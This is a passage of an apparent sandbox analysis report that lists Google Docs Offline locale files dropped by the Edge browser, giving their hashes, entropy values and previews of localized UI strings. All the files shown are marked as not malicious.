Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
